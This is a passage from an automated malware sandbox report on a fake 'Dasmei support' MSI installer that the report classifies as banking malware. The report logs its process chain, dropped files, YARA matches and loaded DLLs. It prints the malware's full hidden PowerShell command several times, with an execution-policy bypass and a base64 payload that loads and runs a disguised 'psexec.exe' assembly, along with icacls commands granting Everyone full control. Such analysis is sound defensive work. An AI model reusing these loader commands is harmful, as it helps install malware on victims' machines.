QAaQBvAG4ALgBNAGUAcwBzAGEAZwBlACkAIAAtAEYAbwByAGUAIABSAGUAZAAgAA0ACgB9AA==
    Source: C:\Program Files (x86)\Dasmei support\App Dasmei installer\psexec.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\windowspowershell\v1.0\powershell.exe" -sta -noprofile -executionpolicy bypass -encodedcommand JAB4AD0AJwAzADEAOQAzADIANgBiADYALQBjADQANgBiAC0ANAA1ADAANwAtADgANABkADIALQA5ADgAMgAzADUAOQAzAGUAMgA1AGYANAAnADsAJAB5AD0AJwBDADoAXABQAHIAbwBnAHIAYQBtACAARgBpAGwAZQBzACAAKAB4ADgANgApAFwARABhAHMAbQBlAGkAIABzAHUAcABwAG8AcgB0AFwAQQBwAHAAIABEAGEAcwBtAGUAaQAgACAAaQBuAHMAdABhAGwAbABlAHIAXABwAHMAZQB4AGUAYwAuAGUAeABlACcAOwB0AHIAeQAgAHsADQAKACAAIABpAGYAIAAoAFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AFYAZQByAHMAaQBvAG4ALgBNAGEAagBvAHIAIAAtAGcAZQAgADQAKQANAAoAIAAgAHsAIAAkAG4AdQBsAGwAIAA9ACAAWwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AFUAbgBzAGEAZgBlAEwAbwBhAGQARgByAG8AbQAoACQAeQApACAAfQAgAGUAbABzAGUAIAB7ACAAJABuAHUAbABsACAAPQAgAFsAUgBlAGYAbABlAGMAdABpAG8AbgAuAEEAcwBzAGUAbQBiAGwAeQBdADoAOgBMAG8AYQBkAEYAaQBsAGUAKAAkAHkAKQB9AA0ACgAgACAALgAgACgAWwBfADMAMgAuAF8AOAA4AF0AOgA6AF8ANwA0ACgAJAB4ACkAKQANAAoAIAAgAGUAeABpAHQAIAAkAEwAQQBTAFQARQBYAEkAVABDAE8ARABFAA0ACgB9ACAADQAKAGMAYQB0AGMAaAAgAFsATgBvAHQAUwB1AHAAcABvAHIAdABlAGQARQB4AGMAZQBwAHQAaQBvAG4AXQANAAoAewANAAoAIAAgAFcAcgBpAHQAZQAtAEgAbwBzAHQAIAAnAEEAcABwAGwAaQBjAGEAdABpAG8AbgAgAGwAbwBjAGEAdABpAG8AbgAgAGkAcwAgAHUAbgB0AHIAdQBzAHQAZQBkAC4AIABDAG8AcAB5ACAAZgBpAGwAZQAgAHQAbwAgAGEAIABsAG8AYwBhAGwAIABkAHIAaQB2AGUALAAgAGEAbgBkACAAdAByAHkAIABhAGcAYQBpAG4ALgAnACAALQBGAG8AcgBlAGcAcgBvAHUAbgBkAEMAbwBsAG8AcgAgAFIAZQBkAA0ACgB9AA0ACgBjAGEAdABjAGgAIAB7AA0ACgAgACAAVwByAGkAdABlAC0ASABvAHMAdAAgACgAIgBFAHIAcgBvAHIAOgAgACIAIAArACAAJABfAC4ARQB4AGMAZQBwAHQAaQBvAG4ALgBNAGUAcwBzAGEAZwBlACkAIAAtAEYAbwByAGUAIABSAGUAZAAgAA0ACgB9AA==Jump to behavior

    System Summary

    barindex
    Source: amsi64_796.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
    Source: Process Memory Space: powershell.exe PID: 796, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
    Source: psexec.exe.2.dr, _88.csLong String: Length: 22184
    Source: psexec.exe.3.dr, _88.csLong String: Length: 22184
    Source: play.exe.6.drStatic PE information: section name: .!Zx
    Source: play.exe.6.drStatic PE information: section name: .]#m
    Source: play.exe.6.drStatic PE information: section name: .2"V
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Nvidia-59226\play.exeJump to dropped file
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Nvidia-59226\Nvidia-59226.exe (copy)Jump to dropped file
    Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\7027bb.msiJump to behavior
    Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI28E4.tmpJump to behavior
    Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI2971.tmpJump to behavior
    Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI29A1.tmpJump to behavior
    Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI29C1.tmpJump to behavior
    Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI2A10.tmpJump to behavior
    Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI2A6F.tmpJump to behavior
    Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\inprogressinstallinfo.ipiJump to behavior
    Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\SourceHash{A9CC6EF7-3385-4831-8011-67303F5E511F}Jump to behavior
    Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI2B5B.tmpJump to behavior
    Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI2EE6.tmpJump to behavior
    Source: C:\Windows\System32\msiexec.exeFile deleted: C:\Windows\Installer\MSI28E4.tmpJump to behavior
    Source: C:\Windows\Installer\MSI2EE6.tmpCode function: 4_2_00B134B04_2_00B134B0
    Source: C:\Windows\Installer\MSI2EE6.tmpCode function: 4_2_00ADD4A04_2_00ADD4A0
    Source: C:\Windows\Installer\MSI2EE6.tmpCode function: 4_2_00AFB4A04_2_00AFB4A0
    Source: C:\Windows\Installer\MSI2EE6.tmpCode function: 4_2_00B014904_2_00B01490
    Source: C:\Windows\Installer\MSI2EE6.tmpCode function: 4_2_00B0F4434_2_00B0F443
    Source: C:\Windows\Installer\MSI2EE6.tmpCode function: 4_2_00B056304_2_00B05630
    Source: C:\Windows\Installer\MSI2EE6.tmpCode function: 4_2_00B0367F4_2_00B0367F
    Source: C:\Windows\Installer\MSI2EE6.tmpCode function: 4_2_00B0181E4_2_00B0181E
    Source: C:\Windows\Installer\MSI2EE6.tmpCode function: 4_2_00B14C0F4_2_00B14C0F
    Source: C:\Windows\Installer\MSI2EE6.tmpCode function: 4_2_00B0CD194_2_00B0CD19
    Source: C:\Windows\Installer\MSI2EE6.tmpCode function: 4_2_00B07E0B4_2_00B07E0B
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FFD340C3EA96_2_00007FFD340C3EA9
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FFD340C6AC36_2_00007FFD340C6AC3
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FFD340BFC886_2_00007FFD340BFC88
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FFD340BD4856_2_00007FFD340BD485
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FFD340BC4A86_2_00007FFD340BC4A8
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FFD340BD4D36_2_00007FFD340BD4D3
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FFD340BCCFB6_2_00007FFD340BCCFB
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FFD340C0D7A6_2_00007FFD340C0D7A
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FFD340C0DE06_2_00007FFD340C0DE0
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FFD340B8EFA6_2_00007FFD340B8EFA
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FFD340B17F26_2_00007FFD340B17F2
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FFD340BC0FA6_2_00007FFD340BC0FA
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FFD340B3AFB6_2_00007FFD340B3AFB
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FFD340B62F36_2_00007FFD340B62F3
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FFD340C0B216_2_00007FFD340C0B21
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FFD340C1BBD6_2_00007FFD340C1BBD
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FFD3444306E6_2_00007FFD3444306E
    Source: Joe Sandbox ViewDropped File: C:\Nvidia-59226\Nvidia-59226.exe (copy) 48590573F48E243DEA35B018401933E3B5CBC19EDB94377C7D54394F127E214C
    Source: Joe Sandbox ViewDropped File: C:\Nvidia-59226\play.exe 48590573F48E243DEA35B018401933E3B5CBC19EDB94377C7D54394F127E214C
    Source: C:\Windows\Installer\MSI2EE6.tmpCode function: String function: 00AFA320 appears 39 times
    Source: C:\Windows\Installer\MSI2EE6.tmpCode function: String function: 00AF9F53 appears 100 times
    Source: C:\Windows\Installer\MSI2EE6.tmpCode function: String function: 00AF9F86 appears 72 times
    Source: dummy_app.exe.2.drStatic PE information: Resource name: RT_VERSION type: Intel ia64 COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
    Source: .bkp.2.drStatic PE information: Number of sections : 11 > 10
    Source: dummy_app.exe.2.drStatic PE information: Number of sections : 11 > 10
    Source: cB1ItKbbhY.msiBinary or memory string: OriginalFilenameviewer.exeF vs cB1ItKbbhY.msi
    Source: cB1ItKbbhY.msiBinary or memory string: OriginalFilenameMsiTempFiles.dllF vs cB1ItKbbhY.msi
    Source: cB1ItKbbhY.msiBinary or memory string: OriginalFilenamelzmaextractor.dllF vs cB1ItKbbhY.msi
    Source: cB1ItKbbhY.msiBinary or memory string: OriginalFilenameAICustAct.dllF vs cB1ItKbbhY.msi
    Source: cB1ItKbbhY.msiBinary or memory string: OriginalFilenameDASMEI.exe0 vs cB1ItKbbhY.msi
    Source: amsi64_796.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
    Source: Process Memory Space: powershell.exe PID: 796, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
    Source: classification engineClassification label: mal100.bank.evad.winMSI@20/41@1/3
    Source: C:\Windows\Installer\MSI2EE6.tmpCode function: 4_2_00AD62C0 CreateToolhelp32Snapshot,CloseHandle,Process32FirstW,OpenProcess,CloseHandle,Process32NextW,CloseHandle,4_2_00AD62C0
    Source: C:\Windows\Installer\MSI2EE6.tmpCode function: 4_2_00AD6FE0 CoInitialize,CoCreateInstance,VariantInit,IUnknown_QueryService,CoAllowSetForegroundWindow,SysAllocString,SysAllocString,SysAllocString,VariantInit,LocalFree,OpenProcess,WaitForSingleObject,GetExitCodeProcess,CloseHandle,LocalFree,VariantClear,VariantClear,VariantClear,VariantClear,SysFreeString,VariantClear,CoUninitialize,_com_issue_error,4_2_00AD6FE0
    Source: C:\Windows\Installer\MSI2EE6.tmpCode function: 4_2_00AD1D90 LoadResource,LockResource,SizeofResource,4_2_00AD1D90
    Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Dasmei supportJump to behavior
    Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\Public\Desktop\dummy_app.exe.lnkJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6520:120:WilError_03
    Source: C:\Nvidia-59226\Nvidia-59226.exeMutant created: \Sessions\1\BaseNamedObjects\5A14A57C2024
    Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\TEMP\~DF68074FEFF01017E8.TMPJump to behavior
    Source: Yara matchFile source: C:\Program Files (x86)\Dasmei support\App Dasmei installer\.bkp, type: DROPPED
    Source: C:\Nvidia-59226\Nvidia-59226.exeKey opened: HKEY_USERS.DEFAULT\Software\Borland\Delphi\LocalesJump to behavior
    Source: C:\Nvidia-59226\Nvidia-59226.exeKey opened: HKEY_USERS.DEFAULT\Software\Borland\Delphi\LocalesJump to behavior
    Source: C:\Nvidia-59226\Nvidia-59226.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
    Source: C:\Nvidia-59226\Nvidia-59226.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
    Source: C:\Windows\System32\msiexec.exeFile read: C:\Program Files (x86)\desktop.iniJump to behavior
    Source: C:\Windows\Installer\MSI2EE6.tmpKey opened: HKEY_USERSS-1-5-18\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
    Source: cB1ItKbbhY.msiReversingLabs: Detection: 23%
    Source: cB1ItKbbhY.msiVirustotal: Detection: 8%
    Source: unknownProcess created: C:\Windows\System32\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\cB1ItKbbhY.msi"
    Source: unknownProcess created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
    Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding E94365CFD725BFADC9A5695E48A7145F
    Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\Installer\MSI2EE6.tmp "C:\Windows\Installer\MSI2EE6.tmp" /HideWindow "C:\Program Files (x86)\Dasmei support\App Dasmei installer\psexec.exe" "C:\Program Files (x86)\Dasmei support\App Dasmei installer\1e.ps1"
    Source: C:\Windows\Installer\MSI2EE6.tmpProcess created: C:\Program Files (x86)\Dasmei support\App Dasmei installer\psexec.exe "C:\Program Files (x86)\Dasmei support\App Dasmei installer\psexec.exe" "C:\Program Files (x86)\Dasmei support\App Dasmei installer\1e.ps1"
    Source: C:\Program Files (x86)\Dasmei support\App Dasmei installer\psexec.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\windowspowershell\v1.0\powershell.exe" -sta -noprofile -executionpolicy bypass -encodedcommand JAB4AD0AJwAzADEAOQAzADIANgBiADYALQBjADQANgBiAC0ANAA1ADAANwAtADgANABkADIALQA5ADgAMgAzADUAOQAzAGUAMgA1AGYANAAnADsAJAB5AD0AJwBDADoAXABQAHIAbwBnAHIAYQBtACAARgBpAGwAZQBzACAAKAB4ADgANgApAFwARABhAHMAbQBlAGkAIABzAHUAcABwAG8AcgB0AFwAQQBwAHAAIABEAGEAcwBtAGUAaQAgACAAaQBuAHMAdABhAGwAbABlAHIAXABwAHMAZQB4AGUAYwAuAGUAeABlACcAOwB0AHIAeQAgAHsADQAKACAAIABpAGYAIAAoAFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AFYAZQByAHMAaQBvAG4ALgBNAGEAagBvAHIAIAAtAGcAZQAgADQAKQANAAoAIAAgAHsAIAAkAG4AdQBsAGwAIAA9ACAAWwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AFUAbgBzAGEAZgBlAEwAbwBhAGQARgByAG8AbQAoACQAeQApACAAfQAgAGUAbABzAGUAIAB7ACAAJABuAHUAbABsACAAPQAgAFsAUgBlAGYAbABlAGMAdABpAG8AbgAuAEEAcwBzAGUAbQBiAGwAeQBdADoAOgBMAG8AYQBkAEYAaQBsAGUAKAAkAHkAKQB9AA0ACgAgACAALgAgACgAWwBfADMAMgAuAF8AOAA4AF0AOgA6AF8ANwA0ACgAJAB4ACkAKQANAAoAIAAgAGUAeABpAHQAIAAkAEwAQQBTAFQARQBYAEkAVABDAE8ARABFAA0ACgB9ACAADQAKAGMAYQB0AGMAaAAgAFsATgBvAHQAUwB1AHAAcABvAHIAdABlAGQARQB4AGMAZQBwAHQAaQBvAG4AXQANAAoAewANAAoAIAAgAFcAcgBpAHQAZQAtAEgAbwBzAHQAIAAnAEEAcABwAGwAaQBjAGEAdABpAG8AbgAgAGwAbwBjAGEAdABpAG8AbgAgAGkAcwAgAHUAbgB0AHIAdQBzAHQAZQBkAC4AIABDAG8AcAB5ACAAZgBpAGwAZQAgAHQAbwAgAGEAIABsAG8AYwBhAGwAIABkAHIAaQB2AGUALAAgAGEAbgBkACAAdAByAHkAIABhAGcAYQBpAG4ALgAnACAALQBGAG8AcgBlAGcAcgBvAHUAbgBkAEMAbwBsAG8AcgAgAFIAZQBkAA0ACgB9AA0ACgBjAGEAdABjAGgAIAB7AA0ACgAgACAAVwByAGkAdABlAC0ASABvAHMAdAAgACgAIgBFAHIAcgBvAHIAOgAgACIAIAArACAAJABfAC4ARQB4AGMAZQBwAHQAaQBvAG4ALgBNAGUAcwBzAGEAZwBlACkAIAAtAEYAbwByAGUAIABSAGUAZAAgAA0ACgB9AA==
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\icacls.exe "C:\Windows\system32\icacls.exe" C:\Nvidia-59226 /grant Everyone:F /T /C
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
    Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\icacls.exe "C:\Windows\system32\icacls.exe" C:\Nvidia-59226\Nvidia-59226.exe /grant Everyone:F /T /C
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Nvidia-59226\Nvidia-59226.exe "C:\Nvidia-59226\Nvidia-59226.exe"
    Source: unknownProcess created: C:\Nvidia-59226\Nvidia-59226.exe "C:\Nvidia-59226\Nvidia-59226.exe"
    Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding E94365CFD725BFADC9A5695E48A7145FJump to behavior
    Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\Installer\MSI2EE6.tmp "C:\Windows\Installer\MSI2EE6.tmp" /HideWindow "C:\Program Files (x86)\Dasmei support\App Dasmei installer\psexec.exe" "C:\Program Files (x86)\Dasmei support\App Dasmei installer\1e.ps1"Jump to behavior
    Source: C:\Windows\Installer\MSI2EE6.tmpProcess created: C:\Program Files (x86)\Dasmei support\App Dasmei installer\psexec.exe "C:\Program Files (x86)\Dasmei support\App Dasmei installer\psexec.exe" "C:\Program Files (x86)\Dasmei support\App Dasmei installer\1e.ps1"Jump to behavior
    Source: C:\Program Files (x86)\Dasmei support\App Dasmei installer\psexec.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\windowspowershell\v1.0\powershell.exe" -sta -noprofile -executionpolicy bypass -encodedcommand JAB4AD0AJwAzADEAOQAzADIANgBiADYALQBjADQANgBiAC0ANAA1ADAANwAtADgANABkADIALQA5ADgAMgAzADUAOQAzAGUAMgA1AGYANAAnADsAJAB5AD0AJwBDADoAXABQAHIAbwBnAHIAYQBtACAARgBpAGwAZQBzACAAKAB4ADgANgApAFwARABhAHMAbQBlAGkAIABzAHUAcABwAG8AcgB0AFwAQQBwAHAAIABEAGEAcwBtAGUAaQAgACAAaQBuAHMAdABhAGwAbABlAHIAXABwAHMAZQB4AGUAYwAuAGUAeABlACcAOwB0AHIAeQAgAHsADQAKACAAIABpAGYAIAAoAFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AFYAZQByAHMAaQBvAG4ALgBNAGEAagBvAHIAIAAtAGcAZQAgADQAKQANAAoAIAAgAHsAIAAkAG4AdQBsAGwAIAA9ACAAWwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AFUAbgBzAGEAZgBlAEwAbwBhAGQARgByAG8AbQAoACQAeQApACAAfQAgAGUAbABzAGUAIAB7ACAAJABuAHUAbABsACAAPQAgAFsAUgBlAGYAbABlAGMAdABpAG8AbgAuAEEAcwBzAGUAbQBiAGwAeQBdADoAOgBMAG8AYQBkAEYAaQBsAGUAKAAkAHkAKQB9AA0ACgAgACAALgAgACgAWwBfADMAMgAuAF8AOAA4AF0AOgA6AF8ANwA0ACgAJAB4ACkAKQANAAoAIAAgAGUAeABpAHQAIAAkAEwAQQBTAFQARQBYAEkAVABDAE8ARABFAA0ACgB9ACAADQAKAGMAYQB0AGMAaAAgAFsATgBvAHQAUwB1AHAAcABvAHIAdABlAGQARQB4AGMAZQBwAHQAaQBvAG4AXQANAAoAewANAAoAIAAgAFcAcgBpAHQAZQAtAEgAbwBzAHQAIAAnAEEAcABwAGwAaQBjAGEAdABpAG8AbgAgAGwAbwBjAGEAdABpAG8AbgAgAGkAcwAgAHUAbgB0AHIAdQBzAHQAZQBkAC4AIABDAG8AcAB5ACAAZgBpAGwAZQAgAHQAbwAgAGEAIABsAG8AYwBhAGwAIABkAHIAaQB2AGUALAAgAGEAbgBkACAAdAByAHkAIABhAGcAYQBpAG4ALgAnACAALQBGAG8AcgBlAGcAcgBvAHUAbgBkAEMAbwBsAG8AcgAgAFIAZQBkAA0ACgB9AA0ACgBjAGEAdABjAGgAIAB7AA0ACgAgACAAVwByAGkAdABlAC0ASABvAHMAdAAgACgAIgBFAHIAcgBvAHIAOgAgACIAIAArACAAJABfAC4ARQB4AGMAZQBwAHQAaQBvAG4ALgBNAGUAcwBzAGEAZwBlACkAIAAtAEYAbwByAGUAIABSAGUAZAAgAA0ACgB9AA==Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\icacls.exe "C:\Windows\system32\icacls.exe" C:\Nvidia-59226 /grant Everyone:F /T /CJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\icacls.exe "C:\Windows\system32\icacls.exe" C:\Nvidia-59226\Nvidia-59226.exe /grant Everyone:F /T /CJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Nvidia-59226\Nvidia-59226.exe "C:\Nvidia-59226\Nvidia-59226.exe" Jump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: apphelp.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: aclayers.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: sfc.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: sfc_os.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: msi.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: srpapi.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: tsappcmp.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: textinputframework.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: coreuicomponents.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: coremessaging.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: ntmarta.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: coremessaging.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: propsys.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: textshaping.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: netapi32.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: wkscli.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: version.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: mscoree.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: pcacli.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: mpr.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: apphelp.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: aclayers.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: sfc.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: sfc_os.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: msi.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: tsappcmp.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: netapi32.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: wkscli.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: srclient.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: spp.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: powrprof.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: vssapi.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: vsstrace.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: umpdc.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: mscoree.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: version.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: rstrtmgr.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: ncrypt.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: ntasn1.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: pcacli.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: mpr.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: ntmarta.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: cabinet.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: propsys.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: linkinfo.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: ntshrui.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: srvcli.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: cscapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msi.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: logoncli.dllJump to behavior
